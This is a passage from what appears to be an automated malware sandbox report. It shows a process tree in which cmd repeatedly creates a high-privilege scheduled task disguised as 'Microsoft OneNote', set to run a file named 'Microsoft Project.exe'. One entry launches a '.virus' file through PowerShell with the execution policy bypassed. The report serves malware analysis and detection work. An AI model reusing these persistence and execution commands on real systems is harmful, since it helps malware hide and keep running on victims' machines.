                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4320
                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:3496
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4500
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4636
                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4284
                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1032
                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:1112
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:1868
                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4448
                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1524
                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1028
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1044
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"' & exit
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:2872
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"'
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:4416
                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:3988
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3376
                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3384
                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2448
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1040
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:1688
                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:2252
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                          PID:2476
                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:440
                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:4416
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                PID:1664
                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:1040
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                  PID:848
                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1440
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:4816
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:2792
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:4536
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:4060
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:404
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:1664
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:1976
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:396
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                    PID:1712
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:512
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:640
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:780
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:3660
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:2324
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:2424
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1868
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1912
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                      PID:2088
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3100
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3624
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                          PID:764
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1244
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4044
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3600
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                PID:1360
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4948
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3128
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2748
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                      PID:2424
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2420
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1912
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1564
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3100
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1500
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4080
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1100
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                        PID:412
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3560
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
